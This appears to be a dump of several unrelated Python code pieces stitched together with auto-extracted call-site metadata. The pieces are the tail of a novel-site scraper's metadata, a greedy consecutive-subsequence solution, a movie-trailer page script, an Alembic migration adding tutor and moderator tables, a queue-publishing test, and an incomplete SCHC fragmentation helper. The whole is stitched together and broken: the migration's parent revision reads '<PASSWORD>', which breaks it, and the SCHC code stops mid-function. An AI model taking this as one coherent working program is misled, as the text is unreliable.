"bs4.BeautifulSoup",
"re.sub",
"basesite.SiteInfo"
] |
[((300, 446), 'basesite.SiteInfo', 'basesite.SiteInfo', ([], {'type': '"""网络小说"""', 'statue': '"""上线版本"""', 'url': '"""https://www.soxs.cc"""', 'name': '"""搜小说"""', 'brief_name': '"""搜小说"""', 'version': '"""1.1"""', 'max_threading_number': '(50)'}), "(type='网络小说', statue='上线版本', url='https://www.soxs.cc',\n name='搜小说', brief_name='搜小说', version='1.1', max_threading_number=50)\n", (317, 446), False, 'import basesite\n'), ((740, 758), 'requests.session', 'requests.session', ([], {}), '()\n', (756, 758), False, 'import requests\n'), ((1093, 1132), 'bs4.BeautifulSoup', 'BeautifulSoup', (['r.content', '"""html.parser"""'], {}), "(r.content, 'html.parser')\n", (1106, 1132), False, 'from bs4 import BeautifulSoup\n'), ((2165, 2204), 'bs4.BeautifulSoup', 'BeautifulSoup', (['r.content', '"""html.parser"""'], {}), "(r.content, 'html.parser')\n", (2178, 2204), False, 'from bs4 import BeautifulSoup\n'), ((2623, 2650), 'copy.deepcopy', 'copy.deepcopy', (['self.session'], {}), '(self.session)\n', (2636, 2650), False, 'import copy\n'), ((2810, 2849), 'bs4.BeautifulSoup', 'BeautifulSoup', (['r.content', '"""html.parser"""'], {}), "(r.content, 'html.parser')\n", (2823, 2849), False, 'from bs4 import BeautifulSoup\n'), ((2923, 2961), 're.sub', 're.sub', (['"""您可以在百度.+查找最新章节!"""', '""""""', 'content'], {}), "('您可以在百度.+查找最新章节!', '', content)\n", (2929, 2961), False, 'import re\n'), ((1743, 1839), 'basesite.Book', 'basesite.Book', ([], {'site': 'self', 'url': 'book_url', 'name': 'book_name', 'author': 'book_author', 'brief': 'book_brief'}), '(site=self, url=book_url, name=book_name, author=book_author,\n brief=book_brief)\n', (1756, 1839), False, 'import basesite\n'), ((2292, 2386), 'basesite.Chapter', 'basesite.Chapter', ([], {'site': 'self', 'url': "(self.base_url + chapter.attrs['href'])", 'title': 'chapter.text'}), "(site=self, url=self.base_url + chapter.attrs['href'],\n title=chapter.text)\n", (2308, 2386), False, 'import basesite\n'), ((2979, 3032), 're.search', 're.search', 
(['"""\\\\w+最新章节地址:https://www.soxs.cc"""', 'content2'], {}), "('\\\\w+最新章节地址:https://www.soxs.cc', content2)\n", (2988, 3032), False, 'import re\n')]
|
# You are given an integer array sorted in ascending order (may contain duplicates), you need to split them into several subsequences, where each subsequences consist of at least 3 consecutive integers. Return whether you can make such a split.
#
# Example 1:
# Input: [1,2,3,3,4,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3
# 3, 4, 5
# Example 2:
# Input: [1,2,3,3,4,4,5,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3, 4, 5
# 3, 4, 5
# Example 3:
# Input: [1,2,3,4,4,5]
# Output: False
# Note:
# The length of the input is in range of [1, 10000]
import collections
class Solution(object):
    """Greedy split of a sorted array into runs of >= 3 consecutive integers."""

    def isPossible(self, nums):
        """
        Decide whether ``nums`` (sorted ascending, duplicates allowed) can be
        partitioned into subsequences of at least 3 consecutive integers.

        Greedy invariant: ``run_ends[v]`` counts open runs of length >= 3
        waiting to consume value ``v``; extending an open run is always
        preferred over starting a fresh run of 3.

        :type nums: List[int]
        :rtype: bool
        """
        remaining = collections.Counter(nums)
        run_ends = collections.Counter()
        for num in nums:
            if not remaining[num]:
                continue  # already consumed by an earlier run start
            remaining[num] -= 1
            if run_ends[num]:
                # Extend an existing run ending just before num.
                run_ends[num] -= 1
                run_ends[num + 1] += 1
            elif remaining[num + 1] and remaining[num + 2]:
                # Start a new run num, num+1, num+2.
                remaining[num + 1] -= 1
                remaining[num + 2] -= 1
                run_ends[num + 3] += 1
            else:
                return False
        return True
# Module-level smoke test: [1,2,3,4,5] + [3,4,5] is a valid split (result unused).
s=Solution()
s.isPossible([1,2,3,3,4,4,5,5])
|
[
"collections.Counter"
] |
[((823, 848), 'collections.Counter', 'collections.Counter', (['nums'], {}), '(nums)\n', (842, 848), False, 'import collections\n'), ((865, 886), 'collections.Counter', 'collections.Counter', ([], {}), '()\n', (884, 886), False, 'import collections\n')]
|
# website.py
# Created by: <NAME>
# Date: 5 June 2015
# Purpouse: This file is for instantiating all the movie objects and then
# call display_page.py to render the movies in an html page
import display_page
import movie
# Creating objects for my favourite movie
# Movie objects are built positionally: title, tagline, year, studio,
# distributor, director(s), award, poster URL, trailer URL
# (inferred from the values; confirm against movie.Movie's signature).
cars = movie.Movie(
    "Cars",
    "Story about live cars",
    "2006",
    "Pixar Animation Studios",
    "Walt Disney Pictures",
    "<NAME>",
    "Golden Globe Award for Best Animated Feature Film",
    "https://upload.wikimedia.org/wikipedia/en/3/34/Cars_2006.jpg",
    "https://www.youtube.com/watch?v=WGByijP0Leo"
)
ratatouille = movie.Movie(
    "Ratatouille",
    "Anybody can cook",
    "2007",
    "Pixar Animation Studios",
    "Walt Disney Pictures",
    "<NAME>",
    "Academy Award for Best Animated Feature",
    "https://upload.wikimedia.org/wikipedia/en/5/50/RatatouillePoster.jpg",
    "https://www.youtube.com/watch?v=c3sBBRxDAqk"
)
tangled = movie.Movie(
    "Tangled",
    "Girl with long golden red hairs",
    "2010",
    "Walt Disney Animation Studios",
    "Walt Disney Pictures",
    "<NAME> & <NAME>",
    "Best Original Song at the 83rd Academy Awards",
    "https://upload.wikimedia.org/wikipedia/en/a/a8/Tangled_poster.jpg",
    "https://www.youtube.com/watch?v=pyOyBVXDJ9Q"
)
brave = movie.Movie(
    "Brave",
    "Girl with lot of courage",
    "2012",
    "Pixar Animation Studios",
    "Walt Disney Pictures",
    "Mark Andrews and <NAME>",
    "Academy Award,the Golden Globe,and the BAFTA Award for Best \
Animated Feature Film.",
    "https://upload.wikimedia.org/wikipedia/en/9/96/Brave_Poster.jpg",
    "https://www.youtube.com/watch?v=6CKcqIahedc"
)
# Create an arrary of all my favourite movies
movies_list = [cars, ratatouille, tangled, brave]
# Call another python script to render the movies on an html page
display_page.open_movies_page(movies_list)
# EOF
|
[
"display_page.open_movies_page",
"movie.Movie"
] |
[((282, 575), 'movie.Movie', 'movie.Movie', (['"""Cars"""', '"""Story about live cars"""', '"""2006"""', '"""Pixar Animation Studios"""', '"""Walt Disney Pictures"""', '"""<NAME>"""', '"""Golden Globe Award for Best Animated Feature Film"""', '"""https://upload.wikimedia.org/wikipedia/en/3/34/Cars_2006.jpg"""', '"""https://www.youtube.com/watch?v=WGByijP0Leo"""'], {}), "('Cars', 'Story about live cars', '2006',\n 'Pixar Animation Studios', 'Walt Disney Pictures', '<NAME>',\n 'Golden Globe Award for Best Animated Feature Film',\n 'https://upload.wikimedia.org/wikipedia/en/3/34/Cars_2006.jpg',\n 'https://www.youtube.com/watch?v=WGByijP0Leo')\n", (293, 575), False, 'import movie\n'), ((627, 920), 'movie.Movie', 'movie.Movie', (['"""Ratatouille"""', '"""Anybody can cook"""', '"""2007"""', '"""Pixar Animation Studios"""', '"""Walt Disney Pictures"""', '"""<NAME>"""', '"""Academy Award for Best Animated Feature"""', '"""https://upload.wikimedia.org/wikipedia/en/5/50/RatatouillePoster.jpg"""', '"""https://www.youtube.com/watch?v=c3sBBRxDAqk"""'], {}), "('Ratatouille', 'Anybody can cook', '2007',\n 'Pixar Animation Studios', 'Walt Disney Pictures', '<NAME>',\n 'Academy Award for Best Animated Feature',\n 'https://upload.wikimedia.org/wikipedia/en/5/50/RatatouillePoster.jpg',\n 'https://www.youtube.com/watch?v=c3sBBRxDAqk')\n", (638, 920), False, 'import movie\n'), ((968, 1290), 'movie.Movie', 'movie.Movie', (['"""Tangled"""', '"""Girl with long golden red hairs"""', '"""2010"""', '"""Walt Disney Animation Studios"""', '"""Walt Disney Pictures"""', '"""<NAME> & <NAME>"""', '"""Best Original Song at the 83rd Academy Awards"""', '"""https://upload.wikimedia.org/wikipedia/en/a/a8/Tangled_poster.jpg"""', '"""https://www.youtube.com/watch?v=pyOyBVXDJ9Q"""'], {}), "('Tangled', 'Girl with long golden red hairs', '2010',\n 'Walt Disney Animation Studios', 'Walt Disney Pictures',\n '<NAME> & <NAME>', 'Best Original Song at the 83rd Academy Awards',\n 
'https://upload.wikimedia.org/wikipedia/en/a/a8/Tangled_poster.jpg',\n 'https://www.youtube.com/watch?v=pyOyBVXDJ9Q')\n", (979, 1290), False, 'import movie\n'), ((1336, 1695), 'movie.Movie', 'movie.Movie', (['"""Brave"""', '"""Girl with lot of courage"""', '"""2012"""', '"""Pixar Animation Studios"""', '"""Walt Disney Pictures"""', '"""Mark Andrews and <NAME>"""', '"""Academy Award,the Golden Globe,and the BAFTA Award for Best Animated Feature Film."""', '"""https://upload.wikimedia.org/wikipedia/en/9/96/Brave_Poster.jpg"""', '"""https://www.youtube.com/watch?v=6CKcqIahedc"""'], {}), "('Brave', 'Girl with lot of courage', '2012',\n 'Pixar Animation Studios', 'Walt Disney Pictures',\n 'Mark Andrews and <NAME>',\n 'Academy Award,the Golden Globe,and the BAFTA Award for Best Animated Feature Film.'\n , 'https://upload.wikimedia.org/wikipedia/en/9/96/Brave_Poster.jpg',\n 'https://www.youtube.com/watch?v=6CKcqIahedc')\n", (1347, 1695), False, 'import movie\n'), ((1896, 1938), 'display_page.open_movies_page', 'display_page.open_movies_page', (['movies_list'], {}), '(movies_list)\n', (1925, 1938), False, 'import display_page\n')]
|
"""add Tutor and Moderator
Revision ID: 12b0e8390634
Revises: <PASSWORD>
Create Date: 2020-01-12 12:41:22.787337
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '12b0e8390634'
# NOTE(review): '<PASSWORD>' looks like a secret-scrubbing artifact; this field
# must hold the real parent revision id or alembic cannot order the history.
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
    """Apply this revision: create the ``moderator`` and ``tutor``
    user<->course association tables, link ``answer`` and ``student`` to
    ``user``, and extend ``user`` with profile/auth columns while dropping
    the old ``status`` column.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    # user<->course association table for moderators.
    op.create_table('moderator',
    sa.Column('user_id', sa.Integer(), nullable=False),
    sa.Column('course_id', sa.Integer(), nullable=False),
    sa.ForeignKeyConstraint(['course_id'], ['course.id'], ),
    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
    sa.PrimaryKeyConstraint('user_id', 'course_id')
    )
    # user<->course association table for tutors (same shape as 'moderator').
    op.create_table('tutor',
    sa.Column('user_id', sa.Integer(), nullable=False),
    sa.Column('course_id', sa.Integer(), nullable=False),
    sa.ForeignKeyConstraint(['course_id'], ['course.id'], ),
    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
    sa.PrimaryKeyConstraint('user_id', 'course_id')
    )
    # Attach answers to a homework and to the authoring user.
    op.add_column('answer', sa.Column('homework_id', sa.Integer(), nullable=True))
    op.add_column('answer', sa.Column('user_id', sa.Integer(), nullable=True))
    op.create_foreign_key(None, 'answer', 'user', ['user_id'], ['id'])
    op.create_foreign_key(None, 'answer', 'homework', ['homework_id'], ['id'])
    # Replace student's own 'id' FK with an explicit 'user_id' FK to user.
    op.add_column('student', sa.Column('entry_year', sa.Integer(), nullable=True))
    op.add_column('student', sa.Column('user_id', sa.Integer(), nullable=False))
    op.drop_constraint('student_id_fkey', 'student', type_='foreignkey')
    op.create_foreign_key(None, 'student', 'user', ['user_id'], ['id'])
    op.drop_column('student', 'id')
    # New profile / auth / role columns on 'user'.
    op.add_column('user', sa.Column('about_me', sa.String(), nullable=True))
    op.add_column('user', sa.Column('city', sa.String(), nullable=True))
    op.add_column('user', sa.Column('facebook_link', sa.String(), nullable=True))
    op.add_column('user', sa.Column('instagram_link', sa.String(), nullable=True))
    op.add_column('user', sa.Column('is_moderator', sa.Boolean(), nullable=True))
    op.add_column('user', sa.Column('is_tutor', sa.Boolean(), nullable=True))
    op.add_column('user', sa.Column('linkedin_link', sa.String(), nullable=True))
    op.add_column('user', sa.Column('middle_name', sa.String(), nullable=True))
    op.add_column('user', sa.Column('password_hash', sa.String(), nullable=True))
    op.add_column('user', sa.Column('vk_link', sa.String(), nullable=True))
    op.drop_column('user', 'status')
    # ### end Alembic commands ###
def downgrade():
    """Revert this revision: restore ``user.status`` and ``student.id``,
    drop the columns/constraints added by :func:`upgrade`, and drop the
    ``tutor`` and ``moderator`` tables.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('user', sa.Column('status', sa.VARCHAR(), autoincrement=False, nullable=True))
    op.drop_column('user', 'vk_link')
    op.drop_column('user', 'password_hash')
    op.drop_column('user', 'middle_name')
    op.drop_column('user', 'linkedin_link')
    op.drop_column('user', 'is_tutor')
    op.drop_column('user', 'is_moderator')
    op.drop_column('user', 'instagram_link')
    op.drop_column('user', 'facebook_link')
    op.drop_column('user', 'city')
    op.drop_column('user', 'about_me')
    # Restore the old student PK/FK layout.
    op.add_column('student', sa.Column('id', sa.INTEGER(), autoincrement=False, nullable=False))
    op.drop_constraint(None, 'student', type_='foreignkey')
    op.create_foreign_key('student_id_fkey', 'student', 'user', ['id'], ['id'])
    op.drop_column('student', 'user_id')
    op.drop_column('student', 'entry_year')
    # Both anonymous FKs on 'answer' (user_id, homework_id) are dropped here.
    op.drop_constraint(None, 'answer', type_='foreignkey')
    op.drop_constraint(None, 'answer', type_='foreignkey')
    op.drop_column('answer', 'user_id')
    op.drop_column('answer', 'homework_id')
    op.drop_table('tutor')
    op.drop_table('moderator')
    # ### end Alembic commands ###
|
[
"alembic.op.drop_table",
"sqlalchemy.VARCHAR",
"sqlalchemy.INTEGER",
"alembic.op.create_foreign_key",
"sqlalchemy.PrimaryKeyConstraint",
"alembic.op.drop_constraint",
"alembic.op.drop_column",
"sqlalchemy.Boolean",
"sqlalchemy.ForeignKeyConstraint",
"sqlalchemy.String",
"sqlalchemy.Integer"
] |
[((1385, 1451), 'alembic.op.create_foreign_key', 'op.create_foreign_key', (['None', '"""answer"""', '"""user"""', "['user_id']", "['id']"], {}), "(None, 'answer', 'user', ['user_id'], ['id'])\n", (1406, 1451), False, 'from alembic import op\n'), ((1456, 1530), 'alembic.op.create_foreign_key', 'op.create_foreign_key', (['None', '"""answer"""', '"""homework"""', "['homework_id']", "['id']"], {}), "(None, 'answer', 'homework', ['homework_id'], ['id'])\n", (1477, 1530), False, 'from alembic import op\n'), ((1699, 1767), 'alembic.op.drop_constraint', 'op.drop_constraint', (['"""student_id_fkey"""', '"""student"""'], {'type_': '"""foreignkey"""'}), "('student_id_fkey', 'student', type_='foreignkey')\n", (1717, 1767), False, 'from alembic import op\n'), ((1772, 1839), 'alembic.op.create_foreign_key', 'op.create_foreign_key', (['None', '"""student"""', '"""user"""', "['user_id']", "['id']"], {}), "(None, 'student', 'user', ['user_id'], ['id'])\n", (1793, 1839), False, 'from alembic import op\n'), ((1844, 1875), 'alembic.op.drop_column', 'op.drop_column', (['"""student"""', '"""id"""'], {}), "('student', 'id')\n", (1858, 1875), False, 'from alembic import op\n'), ((2675, 2707), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""status"""'], {}), "('user', 'status')\n", (2689, 2707), False, 'from alembic import op\n'), ((2929, 2962), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""vk_link"""'], {}), "('user', 'vk_link')\n", (2943, 2962), False, 'from alembic import op\n'), ((2967, 3006), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""password_hash"""'], {}), "('user', 'password_hash')\n", (2981, 3006), False, 'from alembic import op\n'), ((3011, 3048), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""middle_name"""'], {}), "('user', 'middle_name')\n", (3025, 3048), False, 'from alembic import op\n'), ((3053, 3092), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""linkedin_link"""'], {}), "('user', 
'linkedin_link')\n", (3067, 3092), False, 'from alembic import op\n'), ((3097, 3131), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""is_tutor"""'], {}), "('user', 'is_tutor')\n", (3111, 3131), False, 'from alembic import op\n'), ((3136, 3174), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""is_moderator"""'], {}), "('user', 'is_moderator')\n", (3150, 3174), False, 'from alembic import op\n'), ((3179, 3219), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""instagram_link"""'], {}), "('user', 'instagram_link')\n", (3193, 3219), False, 'from alembic import op\n'), ((3224, 3263), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""facebook_link"""'], {}), "('user', 'facebook_link')\n", (3238, 3263), False, 'from alembic import op\n'), ((3268, 3298), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""city"""'], {}), "('user', 'city')\n", (3282, 3298), False, 'from alembic import op\n'), ((3303, 3337), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""about_me"""'], {}), "('user', 'about_me')\n", (3317, 3337), False, 'from alembic import op\n'), ((3439, 3494), 'alembic.op.drop_constraint', 'op.drop_constraint', (['None', '"""student"""'], {'type_': '"""foreignkey"""'}), "(None, 'student', type_='foreignkey')\n", (3457, 3494), False, 'from alembic import op\n'), ((3499, 3574), 'alembic.op.create_foreign_key', 'op.create_foreign_key', (['"""student_id_fkey"""', '"""student"""', '"""user"""', "['id']", "['id']"], {}), "('student_id_fkey', 'student', 'user', ['id'], ['id'])\n", (3520, 3574), False, 'from alembic import op\n'), ((3579, 3615), 'alembic.op.drop_column', 'op.drop_column', (['"""student"""', '"""user_id"""'], {}), "('student', 'user_id')\n", (3593, 3615), False, 'from alembic import op\n'), ((3620, 3659), 'alembic.op.drop_column', 'op.drop_column', (['"""student"""', '"""entry_year"""'], {}), "('student', 'entry_year')\n", (3634, 3659), False, 'from alembic import op\n'), 
((3664, 3718), 'alembic.op.drop_constraint', 'op.drop_constraint', (['None', '"""answer"""'], {'type_': '"""foreignkey"""'}), "(None, 'answer', type_='foreignkey')\n", (3682, 3718), False, 'from alembic import op\n'), ((3723, 3777), 'alembic.op.drop_constraint', 'op.drop_constraint', (['None', '"""answer"""'], {'type_': '"""foreignkey"""'}), "(None, 'answer', type_='foreignkey')\n", (3741, 3777), False, 'from alembic import op\n'), ((3782, 3817), 'alembic.op.drop_column', 'op.drop_column', (['"""answer"""', '"""user_id"""'], {}), "('answer', 'user_id')\n", (3796, 3817), False, 'from alembic import op\n'), ((3822, 3861), 'alembic.op.drop_column', 'op.drop_column', (['"""answer"""', '"""homework_id"""'], {}), "('answer', 'homework_id')\n", (3836, 3861), False, 'from alembic import op\n'), ((3866, 3888), 'alembic.op.drop_table', 'op.drop_table', (['"""tutor"""'], {}), "('tutor')\n", (3879, 3888), False, 'from alembic import op\n'), ((3893, 3919), 'alembic.op.drop_table', 'op.drop_table', (['"""moderator"""'], {}), "('moderator')\n", (3906, 3919), False, 'from alembic import op\n'), ((584, 637), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['course_id']", "['course.id']"], {}), "(['course_id'], ['course.id'])\n", (607, 637), True, 'import sqlalchemy as sa\n'), ((661, 710), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['user_id']", "['user.id']"], {}), "(['user_id'], ['user.id'])\n", (684, 710), True, 'import sqlalchemy as sa\n'), ((734, 781), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""user_id"""', '"""course_id"""'], {}), "('user_id', 'course_id')\n", (757, 781), True, 'import sqlalchemy as sa\n'), ((999, 1052), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['course_id']", "['course.id']"], {}), "(['course_id'], ['course.id'])\n", (1022, 1052), True, 'import sqlalchemy as sa\n'), ((1076, 1125), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['user_id']", 
"['user.id']"], {}), "(['user_id'], ['user.id'])\n", (1099, 1125), True, 'import sqlalchemy as sa\n'), ((1149, 1196), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""user_id"""', '"""course_id"""'], {}), "('user_id', 'course_id')\n", (1172, 1196), True, 'import sqlalchemy as sa\n'), ((459, 471), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (469, 471), True, 'import sqlalchemy as sa\n'), ((533, 545), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (543, 545), True, 'import sqlalchemy as sa\n'), ((874, 886), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (884, 886), True, 'import sqlalchemy as sa\n'), ((948, 960), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (958, 960), True, 'import sqlalchemy as sa\n'), ((1272, 1284), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1282, 1284), True, 'import sqlalchemy as sa\n'), ((1351, 1363), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1361, 1363), True, 'import sqlalchemy as sa\n'), ((1584, 1596), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1594, 1596), True, 'import sqlalchemy as sa\n'), ((1664, 1676), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1674, 1676), True, 'import sqlalchemy as sa\n'), ((1924, 1935), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (1933, 1935), True, 'import sqlalchemy as sa\n'), ((1997, 2008), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (2006, 2008), True, 'import sqlalchemy as sa\n'), ((2079, 2090), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (2088, 2090), True, 'import sqlalchemy as sa\n'), ((2162, 2173), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (2171, 2173), True, 'import sqlalchemy as sa\n'), ((2243, 2255), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (2253, 2255), True, 'import sqlalchemy as sa\n'), ((2321, 2333), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (2331, 2333), True, 'import sqlalchemy as sa\n'), ((2404, 2415), 'sqlalchemy.String', 'sa.String', ([], 
{}), '()\n', (2413, 2415), True, 'import sqlalchemy as sa\n'), ((2484, 2495), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (2493, 2495), True, 'import sqlalchemy as sa\n'), ((2566, 2577), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (2575, 2577), True, 'import sqlalchemy as sa\n'), ((2642, 2653), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (2651, 2653), True, 'import sqlalchemy as sa\n'), ((2874, 2886), 'sqlalchemy.VARCHAR', 'sa.VARCHAR', ([], {}), '()\n', (2884, 2886), True, 'import sqlalchemy as sa\n'), ((3383, 3395), 'sqlalchemy.INTEGER', 'sa.INTEGER', ([], {}), '()\n', (3393, 3395), True, 'import sqlalchemy as sa\n')]
|
# -*- coding: utf-8 -*-
# @Author : ydf
# @Time : 2019/8/8 0008 14:57
import time
from test_frame.best_simple_example.test_consume import consumer
# Drain any messages left in the queue from previous runs before publishing.
consumer.publisher_of_same_queue.clear()
# `publisher_of_same_queue` could also be obtained through the get_publisher()
# function, but then you must manually make sure the publisher uses the same
# queue name and the same broker kind as the consumer.  Usage:
# pb = get_publisher('queue_test2',broker_kind=6)
# pb.publish({'a': i, 'b': 2 * i})
# [consumer.publisher_of_same_queue.publish({'a': i, 'b': 2 * i}) for i in range(100)]
for i in range(10000):
    time.sleep(0.05)  # throttle publishing to ~20 messages per second
    consumer.publisher_of_same_queue.publish({'a': i, 'b': 2 * i})
|
[
"time.sleep",
"test_frame.best_simple_example.test_consume.consumer.publisher_of_same_queue.publish",
"test_frame.best_simple_example.test_consume.consumer.publisher_of_same_queue.clear"
] |
[((153, 193), 'test_frame.best_simple_example.test_consume.consumer.publisher_of_same_queue.clear', 'consumer.publisher_of_same_queue.clear', ([], {}), '()\n', (191, 193), False, 'from test_frame.best_simple_example.test_consume import consumer\n'), ((495, 511), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (505, 511), False, 'import time\n'), ((516, 578), 'test_frame.best_simple_example.test_consume.consumer.publisher_of_same_queue.publish', 'consumer.publisher_of_same_queue.publish', (["{'a': i, 'b': 2 * i}"], {}), "({'a': i, 'b': 2 * i})\n", (556, 578), False, 'from test_frame.best_simple_example.test_consume import consumer\n')]
|
#---------------------------------------------------------------------------
import warnings
import struct
import sys
sys.path.append("../../PLIDO-tanupoo")
import fragment
#import schc_fragment as fragment
sys.path.append("../python")
import BitBuffer as BitBufferModule
#---------------------------------------------------------------------------
class BitBuffer_XXX(BitBufferModule.BitBuffer):
    """Multi-bit read/write helpers on top of the project's BitBuffer.

    All multi-bit operations are big-endian within the value: the most
    significant of the ``nb_bits`` bits is written/read first.
    """
    #XXX debug and put in BitBuffer.py
    def __init__(self, *args, **kwargs):
        BitBufferModule.BitBuffer.__init__(self, *args, **kwargs)
    def add_bits(self, bits_as_long_int, nb_bits):
        """Append the nb_bits low-order bits of bits_as_long_int, MSB first."""
        # BUG FIX: range(nb_bits, -1, -1) iterated nb_bits+1 times, writing
        # one extra bit; the highest bit index of an nb_bits field is nb_bits-1.
        for i in range(nb_bits - 1, -1, -1):
            self.add_bit(bits_as_long_int & (1 << i))
    pop_bit = BitBufferModule.BitBuffer.next_bit
    def pop_bits(self, nb_bits):
        """Consume nb_bits bits (MSB first) and return them as an int."""
        result = 0
        # BUG FIX: same off-by-one as add_bits had (nb_bits+1 iterations).
        for i in range(nb_bits - 1, -1, -1):
            if self.pop_bit():
                result |= (1 << i)
        return result  # BUG FIX: the original forgot to return the value
    def pop_byte(self):
        """Consume and return the next 8 bits as one byte value."""
        return self.pop_bits(8)
    def pop_bytes(self, nb_bytes):
        """Consume nb_bytes*8 bits and return them as a bytearray."""
        return bytearray([self.pop_byte() for i in range(nb_bytes)])
    def get_content(self):
        # NOTE(review): reaches into the base class private ``_buf``;
        # assumed to be a sliceable buffer — confirm in BitBuffer.py.
        return self._buf[:]
class FakeBitBuffer:
    """Test double for a bit buffer.

    Instead of packing real bits it records ``(value, nb_bits)`` pairs in
    FIFO order, so tests can inspect exactly which fields were written.
    """

    def __init__(self, content = []):
        # The incoming list is copied, so the shared default is never mutated.
        self.content = list(content)

    def add_bits(self, bits_as_long, nb_bits):
        """Record one field of ``nb_bits`` bits holding ``bits_as_long``."""
        self.content.append((bits_as_long, nb_bits))

    def get_bits(self, nb_bits):
        """Pop the oldest recorded field; its width must equal ``nb_bits``."""
        value, recorded_width = self.content.pop(0)
        assert nb_bits == recorded_width
        return value

    def get_content(self):
        """Return a snapshot copy of the recorded (value, width) pairs."""
        return list(self.content)
def test_BitBuffer():
    """Smoke test: record a handful of fields and print the captured pairs."""
    buf = FakeBitBuffer()
    fields = [(0xf, 4), (0, 2), (0x1, 2),
              (0, 1), (0, 1), (0, 1),
              (0x1, 1), (0x3, 2)]
    for value, width in fields:
        buf.add_bits(value, width)
    print(buf.get_content())
    #print([bin(x) for x in bitbuffer.get_content])
#test_BitBuffer(); exit_now()
#---------------------------------------------------------------------------
# Reliability (acknowledgment) modes named by the SCHC fragmentation draft.
RELIABILITY_OPTION_LIST = ["no-ack", "window", "ack-on-error"]

class SchcFragmentFormat:
    """Field layout of SCHC fragments for one rule.

    Parameters (all sizes in bits):
      R    -- total header size
      T    -- DTag field size
      N    -- FCN field size
      M    -- MIC field size
      mode -- reliability mode, one of RELIABILITY_OPTION_LIST
              (only "window" is supported in this version)
    """
    def __init__(self, R, T, N, M, mode="window"):
        if mode not in RELIABILITY_OPTION_LIST:
            raise ValueError("unknown reliability option", mode)
        self.R = R
        self.T = T
        self.N = N
        self.M = M
        self.mode = mode
        # No-ACK mode carries no W (window) bit in the header.
        if self.mode == "no-ack":
            self.window_field_bitsize = 0
        else: self.window_field_bitsize = 1
        # 880 fragments format this field has a size of R - T - N - 1 bits when
        # 881 Window mode is used.  In No ACK mode, the Rule ID field has a size of
        # 882 R - T - N bits see format section.
        self.rule_id_bitsize = (self.R - self.T - self.N
                                - self.window_field_bitsize)
        assert self.rule_id_bitsize >= 0
        assert self.N >= 1
        assert self.mode == "window" # XXX in this version of the code
    def get_all_0(self):
        """FCN value of an All-0 fragment (last fragment of a window)."""
        return 0
    def get_all_1(self):
        """FCN value of an All-1 fragment (final fragment, carries the MIC)."""
        return 2**self.N - 1
    def get_fcn_max(self):
        """maximum value of the FCN, itself included"""
        # BUG FIX: the original computed self.fcn_max but never returned it,
        # so callers always got None despite what the docstring promises.
        self.fcn_max = 2**self.N - 2
        return self.fcn_max
    def pack_fragment(self, rule_id, dtag, window_index, advertized_fcn,
                      payload, mic = b""):
        """Pack one fragment header + payload into a (fake) bit buffer and
        return its content.  A non-empty ``mic`` is required exactly when
        ``advertized_fcn`` is the All-1 value (final fragment).
        """
        # 1013     <------------ R ---------->
        # 1014             <--T--> 1 <--N-->
        # 1015    +-- ... --+- ... -+-+- ... -+---...---+
        # 1016    | Rule ID |  DTag |W|  FCN  | payload |
        # 1017    +-- ... --+- ... -+-+- ... -+---...---+
        #
        # and
        #
        # 1105    <------------ R ------------>
        # 1106             <- T -> 1 <- N -> <---- M ----->
        # 1107   +-- ... --+- ... -+-+- ... -+---- ... ----+---...---+
        # 1108   | Rule ID |  DTag |W| 11..1 |     MIC     | payload |
        # 1109   +-- ... --+- ... -+-+- ... -+---- ... ----+---...---+
        bit_buffer = FakeBitBuffer()
        bit_buffer.add_bits(rule_id, self.rule_id_bitsize)
        bit_buffer.add_bits(dtag, self.T)
        # only the low bit of the window index goes on the wire (W bit)
        bit_buffer.add_bits(window_index%2, 1)
        bit_buffer.add_bits(advertized_fcn, self.N)
        # MIC present <=> All-1 (final) fragment
